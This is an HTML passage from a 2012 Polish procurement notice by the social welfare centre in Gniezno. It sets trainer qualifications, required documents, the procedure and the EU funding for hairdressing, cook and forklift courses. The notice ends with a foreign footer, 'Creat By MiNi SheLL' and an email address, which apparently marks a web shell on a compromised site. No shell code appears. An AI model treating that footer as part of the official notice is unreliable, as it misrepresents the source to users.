3.w przypadku Kursu obsługi wózków widłowych, doświadczenia w przeprowadzeniu co najmniej 2 kursów w zakresie będącym przedmiotem zamówienia, w tym co najmniej 1 kursu w ramach projektów finansowanych ze środków Unii Europejskiej w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, a ilość osób uczestnicząca w poszczególnych kursach/ grupach wynosiła min. 5 osób, co udokumentowane zostanie dołączonymi referencjami potwierdzającymi należyte wykonanie zadań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku weryfikacji warunku dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający będzie oceniać posiadane wykształcenie i liczbę przeprowadzonych szkoleń w zakresie zagadnień będących przedmiotem zamówienia na podstawie wykazu  osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami, przy czym: 
1. W przypadku Kursu fryzjerskiego osoby wskazane do przeprowadzenia zamówienia muszą posiadać:
W przypadku części teoretycznej: 
- wykształcenie co najmniej średnie kierunkowe zgodne z przedmiotem zamówienia oraz posiadać co najmniej 2 lata doświadczenia w wykonywaniu zawodu zgodnego z przedmiotem zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert,
lub
- wykształcenie co najmniej średnie i tytuł mistrza fryzjerstwa oraz posiadać co najmniej 2 lata doświadczenia w wykonywaniu zawodu zgodnego z przedmiotem zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert,
w przypadku części praktycznej
- wykształcenie co najmniej zasadnicze zawodowe oraz tytuł mistrza fryzjerstwa oraz posiadać co najmniej 2 lata doświadczenia w wykonywaniu zawodu zgodnego z kierunkiem wykształcenia, zgodnego z przedmiotem zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert.
2. W przypadku Kursu przygotowującego do zawodu kucharza:
Zajęcia teoretyczne muszą być prowadzone przez co najmniej 1 osobę posiadającą wykształcenie wyższe, zgodne z przedmiotem zamówienia oraz posiadającą co najmniej 2 letnie doświadczenie zawodowe w wykonywaniu zawodu zgodnego z przedmiotem zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert. 
Zajęcia praktyczne winny być prowadzone przez co najmniej 1 osobę posiadającą wykształcenie co najmniej zasadnicze zawodowe oraz tytuł mistrza zgodny z przedmiotem zamówienia, a także co najmniej 2 letnie doświadczenie zawodowe w wykonywaniu zawodu zgodnego z przedmiotem zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert.

3. W przypadku Kursu obsługi wózków widłowych osoby wskazane do przeprowadzenia zamówienia muszą posiadać: uprawnienia instruktora nauki obsługi wózków widłowych - minimum 3 lata oraz posiadały doświadczenie w prowadzeniu co najmniej 2 kursów zgodnych z zakresem przedmiotu zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez właściwy ze względu na siedzibę instytucji Wojewódzki Urząd Pracy aktualnego na rok 2012 wraz z wydrukiem ze strony internetowej www.ris.praca.gov.pl. potwierdzającym powyższe</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.gniezno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Gnieźnie
ul. Kolejowa 2, 62-200 Gniezno
III p. ok. 05.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2012 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Gnieźnie
ul. Kolejowa 2, 62-200 Gniezno
III p. pok. 07 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Edukacja ku samodzielności - propagowanie aktywnej integracji osób oddalonych od rynku pracy w mieście Gnieźnie współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com